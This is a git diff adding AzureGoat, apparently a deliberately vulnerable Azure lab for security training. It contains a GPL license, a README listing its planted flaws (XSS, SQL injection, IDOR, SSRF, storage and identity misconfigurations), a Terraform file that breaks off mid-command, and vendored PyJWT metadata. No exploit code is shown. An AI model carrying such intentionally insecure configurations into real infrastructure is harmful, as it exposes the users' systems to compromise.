diff --git a/AzureGoat.pdf b/AzureGoat.pdf new file mode 100644 index 0000000..bde2b63 Binary files /dev/null and b/AzureGoat.pdf differ diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..89e08fb --- /dev/null +++ b/LICENSE @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/README.md b/README.md new file mode 100644 index 0000000..7c3eac2 --- /dev/null +++ b/README.md @@ -0,0 +1,143 @@ +# AzureGoat : A Damn Vulnerable Azure Infrastructure + +![1](https://user-images.githubusercontent.com/25884689/183740998-da6f7ae7-2df0-4557-a6f5-2f0040ebe0dc.png) + +Compromising an organization's cloud infrastructure is like sitting on a gold mine for attackers. And sometimes, a simple misconfiguration or a vulnerability in web applications, is all an attacker needs to compromise the entire infrastructure. Since the cloud is relatively new, many developers are not fully aware of the threatscape and they end up deploying a vulnerable cloud infrastructure. Microsoft Azure cloud has become the second-largest vendor by market share in the cloud infrastructure providers (as per multiple reports), just behind AWS. There are numerous tools and vulnerable applications available for AWS for the security professional to perform attack/defense practices, but it is not the case with Azure. There are far fewer options available to the community. + +AzureGoat is a vulnerable by design infrastructure on Azure featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfiguration based on services such as App Functions, CosmosDB, Storage Accounts, Automation and Identities. AzureGoat mimics real-world infrastructure but with added vulnerabilities. It features multiple escalation paths and is focused on a black-box approach. + +The project will be divided into modules and each module will be a separate web application, powered by varied tech stacks and development practices. It will leverage IaC through terraform to ease the deployment process. + +**Presented at** + +- [BlackHat USA 2022](https://www.blackhat.com/us-22/arsenal/schedule/index.html#azuregoat--a-damn-vulnerable-azure-infrastructure-28000) +- [DC 30: Demo Labs](https://forum.defcon.org/node/242061) + +## Built With + +* Azure +* React +* Python 3 +* Terraform + +## Vulnerabilities + +The project is scheduled to encompass all significant vulnerabilities including the OWASP TOP 10 2021, and popular cloud misconfigurations. +Currently, the project contains the following vulnerabilities/misconfigurations. + +* XSS +* SQL Injection +* Insecure Direct Object reference +* Server Side Request Forgery on App Function Environment +* Sensitive Data Exposure and Password Reset +* Storage Account Misconfigurations +* Identity Misconfigurations + +# Getting Started + +### Prerequisites +* An Azure Account + + +### Installation + +To ease the deployment process the user just needs to clone this repo, login to azure cli then initialize and apply the Terraform file. This workflow will deploy the whole infrastructure and output the hosted application's URL. + +Here are the steps to follow: + +**Step 1.** Clone the repo + +```sh +git clone https://github.com/ine-labs/AzureGoat +``` + +**Step 2.** Login to Azure CLI + +```sh +az login +``` + +And follow the steps to sign in. + +**Step 3.** Use terraform to deploy AzureGoat + +```sh +terraform init +terraform apply --auto-approve +``` + +# Modules + +## Module 1 + +The first module features a serverless blog application utilizing Azure App Functions, Storage Accounts, CosmosDB, and Azure Automation. It consists of various web application vulnerabilities and facilitates exploitation of misconfigured Azure resources. + +Overview of escalation paths for module-1 + +![6](https://user-images.githubusercontent.com/25884689/183740988-9fa75f39-8c85-4db7-a5a9-c0f4acdb2783.png) + +# Contributors + +Nishant Sharma, Director, Lab Platform, INE + +Jeswin Mathai, Chief Architect, Lab Platform, INE + +Rachna Umaraniya, Cloud Developer, INE + +Sherin Stephen, Software Engineer (Cloud), INE + + +# Solutions + +The manuals are available in the [solutions](solutions/) directory + +Module 1 Exploitation Videos: + +# Documentation + +For more details refer to the "AzureGoat.pdf" PDF file. This file contains the slide deck used for presentations. + +# Screenshots + +Blog Application HomePage + +![1](https://user-images.githubusercontent.com/25884689/183741003-04609eaa-63fd-43c3-9851-d1e10b5763a9.png) + +Blog Application Login Portal + +![2](https://user-images.githubusercontent.com/65826354/183737940-b1fa7b71-82cb-4744-af6a-22386c22a934.png) + +Blog Application Register Page + +![3](https://user-images.githubusercontent.com/65826354/183737954-2ede9a5b-0797-4eef-8329-9871c14327fd.png) + +Blog Application Logged in Dashboard + +![4](https://user-images.githubusercontent.com/65826354/183737967-a2af9d1e-9805-4658-8055-f3f7ee982b63.png) + +Blog Application User Profile + +![5](https://user-images.githubusercontent.com/65826354/183737979-20c60ca1-14e0-4da9-a3c7-161ef9a62591.png) + +## Contribution Guidelines + +* Contributions in the form of code improvements, module updates, feature improvements, and any general suggestions are welcome. +* Improvements to the functionalities of the current modules are also welcome. +* The source code for each module can be found in ``modules/module-/src`` this can be used to modify the existing application code. + +# License + +This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License v2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. + +You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/. + +# Sister Projects + +- [AWSGoat](https://github.com/ine-labs/AWSGoat) +- GCPSheep (Coming Soon) +- [PA Toolkit (Pentester Academy Wireshark Toolkit)](https://github.com/pentesteracademy/patoolkit) +- [ReconPal: Leveraging NLP for Infosec](https://github.com/pentesteracademy/reconpal) +- [VoIPShark: Open Source VoIP Analysis Platform](https://github.com/pentesteracademy/voipshark) +- [BLEMystique](https://github.com/pentesteracademy/blemystique) diff --git a/main.tf b/main.tf new file mode 100644 index 0000000..f0b54d3 --- /dev/null +++ b/main.tf @@ -0,0 +1,583 @@ +terraform { + required_version = ">= 0.13" + required_providers { + azurerm = { + source = "hashicorp/azurerm" + version = "~> 3.11.0" + } + random = { + source = "hashicorp/random" + version = "~> 3.1.0" + } + } +} + +provider "azurerm" { + features {} +} + + +variable "resource_group" { + default = "azuregoat_app" +} + +variable "location" { + type = string + default = "eastus" +} + + +resource "azurerm_cosmosdb_account" "db" { + name = "ine-cosmos-db-data-${random_id.randomId.dec}" + location = "eastus" + resource_group_name = var.resource_group + offer_type = "Standard" + kind = "GlobalDocumentDB" + + consistency_policy { + consistency_level = "BoundedStaleness" + max_interval_in_seconds = 300 + max_staleness_prefix = 100000 + } + + capabilities { + name = "EnableServerless" + } + + geo_location { + location = "eastus" + failover_priority = 0 + } +} + +resource "null_resource" "file_populate_data" { + provisioner "local-exec" { + command = < + + +Original author +------------------ + +- progrium + + +Patches and Suggestions +----------------------- + + - Boris Feld + + - Åsmund Ødegård + Adding support for RSA-SHA256 privat/public signature. + + - Mark Adams + + - Wouter Bolsterlee + + - Michael Davis + + - Vinod Gupta + + - Derek Weitzel diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/LICENSE new file mode 100644 index 0000000..e8d44d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2015 José Padilla + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/METADATA new file mode 100644 index 0000000..8a9b631 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/METADATA @@ -0,0 +1,115 @@ +Metadata-Version: 2.1 +Name: PyJWT +Version: 1.7.1 +Summary: JSON Web Token implementation in Python +Home-page: http://github.com/jpadilla/pyjwt +Author: Jose Padilla +Author-email: hello@jpadilla.com +License: MIT +Keywords: jwt json web token security signing +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Natural Language :: English +Classifier: License :: OSI Approved :: MIT License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3.4 +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Topic :: Utilities +Provides-Extra: crypto +Requires-Dist: cryptography (>=1.4) ; extra == 'crypto' +Provides-Extra: flake8 +Requires-Dist: flake8 ; extra == 'flake8' +Requires-Dist: flake8-import-order ; extra == 'flake8' +Requires-Dist: pep8-naming ; extra == 'flake8' +Provides-Extra: test +Requires-Dist: pytest (<5.0.0,>=4.0.1) ; extra == 'test' +Requires-Dist: pytest-cov (<3.0.0,>=2.6.0) ; extra == 'test' +Requires-Dist: pytest-runner (<5.0.0,>=4.2) ; extra == 'test' + +PyJWT +===== + +.. image:: https://travis-ci.com/jpadilla/pyjwt.svg?branch=master + :target: http://travis-ci.com/jpadilla/pyjwt?branch=master + +.. image:: https://ci.appveyor.com/api/projects/status/h8nt70aqtwhht39t?svg=true + :target: https://ci.appveyor.com/project/jpadilla/pyjwt + +.. image:: https://img.shields.io/pypi/v/pyjwt.svg + :target: https://pypi.python.org/pypi/pyjwt + +.. image:: https://coveralls.io/repos/jpadilla/pyjwt/badge.svg?branch=master + :target: https://coveralls.io/r/jpadilla/pyjwt?branch=master + +.. image:: https://readthedocs.org/projects/pyjwt/badge/?version=latest + :target: https://pyjwt.readthedocs.io + +A Python implementation of `RFC 7519 `_. Original implementation was written by `@progrium `_. + +Sponsor +------- + ++--------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +| |auth0-logo| | If you want to quickly add secure token-based authentication to Python projects, feel free to check Auth0's Python SDK and free plan at `auth0.com/overview `_. | ++--------------+-----------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ + +.. |auth0-logo| image:: https://user-images.githubusercontent.com/83319/31722733-de95bbde-b3ea-11e7-96bf-4f4e8f915588.png + +Installing +---------- + +Install with **pip**: + +.. code-block:: sh + + $ pip install PyJWT + + +Usage +----- + +.. code:: python + + >>> import jwt + >>> encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') + 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.4twFt5NiznN84AWoo1d7KO1T_yoc0Z6XOpOVswacPZg' + + >>> jwt.decode(encoded, 'secret', algorithms=['HS256']) + {'some': 'payload'} + + +Command line +------------ + +Usage:: + + pyjwt [options] INPUT + +Decoding examples:: + + pyjwt --key=secret decode TOKEN + pyjwt decode --no-verify TOKEN + +See more options executing ``pyjwt --help``. + + +Documentation +------------- + +View the full docs online at https://pyjwt.readthedocs.io/en/latest/ + + +Tests +----- + +You can run tests from the project root after cloning with: + +.. code-block:: sh + + $ python setup.py test + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/RECORD new file mode 100644 index 0000000..5a41c2d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/RECORD @@ -0,0 +1,36 @@ +../../bin/pyjwt,sha256=68OSAFepGPeHFjt5M9VqvTqoHkhg-xWV9LKtwBaOTT8,211 +PyJWT-1.7.1.dist-info/AUTHORS,sha256=rahh5ZJ3f4RSF4X1_K1DvxTRm4Hy45QiMP7dDG_-yrE,595 +PyJWT-1.7.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +PyJWT-1.7.1.dist-info/LICENSE,sha256=7IKvgVtfnahoWvswDMW-t5SeHCK3m2wcBUeWzv32ysY,1080 +PyJWT-1.7.1.dist-info/METADATA,sha256=wIohFuzbkeGUiMkkD5U98z520aUoY6UnmsfDl4vVHRI,3878 +PyJWT-1.7.1.dist-info/RECORD,, +PyJWT-1.7.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +PyJWT-1.7.1.dist-info/WHEEL,sha256=_wJFdOYk7i3xxT8ElOkUJvOdOvfNGbR9g-bf6UQT6sU,110 +PyJWT-1.7.1.dist-info/entry_points.txt,sha256=Xl_tLkGbTgywYa7PwaEY2xSiCtVtM2PdHTL4CW_n9dM,45 +PyJWT-1.7.1.dist-info/top_level.txt,sha256=RP5DHNyJbMq2ka0FmfTgoSaQzh7e3r5XuCWCO8a00k8,4 +jwt/__init__.py,sha256=zzpUkNjnVRNWZKLBgn-t3fR3IWVdCWekrAKtsZWkCoQ,810 +jwt/__main__.py,sha256=_rMsGakpyw1N023P8QOjCgbCxhXSCNIg92YpmUhQGMk,4162 +jwt/__pycache__/__init__.cpython-39.pyc,, +jwt/__pycache__/__main__.cpython-39.pyc,, +jwt/__pycache__/algorithms.cpython-39.pyc,, +jwt/__pycache__/api_jws.cpython-39.pyc,, +jwt/__pycache__/api_jwt.cpython-39.pyc,, +jwt/__pycache__/compat.cpython-39.pyc,, +jwt/__pycache__/exceptions.cpython-39.pyc,, +jwt/__pycache__/help.cpython-39.pyc,, +jwt/__pycache__/utils.cpython-39.pyc,, +jwt/algorithms.py,sha256=kL1ARjxNL8JeuxEpWS8On14qJWomMX_A_ncIrnZhBrA,13336 +jwt/api_jws.py,sha256=wQxbg_cYR4hAJl4-9Ijf29B46NrOKhruXS7ANPFqkZ8,8095 +jwt/api_jwt.py,sha256=NKRiCsTcMd0B5N-74zvqBYpQuxBxC4f6TCLM6P0jxVU,7905 +jwt/compat.py,sha256=VG2zhmZFQ5spP0AThSVumRogymUXORz6fxA1jTew-cA,1624 +jwt/contrib/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +jwt/contrib/__pycache__/__init__.cpython-39.pyc,, +jwt/contrib/algorithms/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc,, +jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc,, +jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc,, +jwt/contrib/algorithms/py_ecdsa.py,sha256=tSTUrwx-u14DJcqAChRzJG-wf7bEY2Gv2hI5xSZZNjk,1771 +jwt/contrib/algorithms/pycrypto.py,sha256=mU3vRfk9QKj06ky3XXKXNkxv8-R4mBHbFR3EvbOgJ6k,1249 +jwt/exceptions.py,sha256=kGq96NMkyPBmx7-RXvLXq9ddTo2_SJPKPTpPscvGUuA,986 +jwt/help.py,sha256=w9sYBatZK8-DIAxLPsdxQBVHXnqjOTETJ4dFY5hhEHs,1609 +jwt/utils.py,sha256=RraFiloy_xsB8NA1CrlHxS9lR73If8amInQ3P1mKXeM,2629 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/WHEEL new file mode 100644 index 0000000..c6a71df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.32.3) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/entry_points.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/entry_points.txt new file mode 100644 index 0000000..1429888 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/entry_points.txt @@ -0,0 +1,3 @@ +[console_scripts] +pyjwt = jwt.__main__:main + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/top_level.txt new file mode 100644 index 0000000..c192380 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/top_level.txt @@ -0,0 +1 @@ +jwt diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/six.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/six.cpython-39.pyc new file mode 100644 index 0000000..58e779e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/six.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/typing_extensions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/typing_extensions.cpython-39.pyc new file mode 100644 index 0000000..de837a3 Binary files 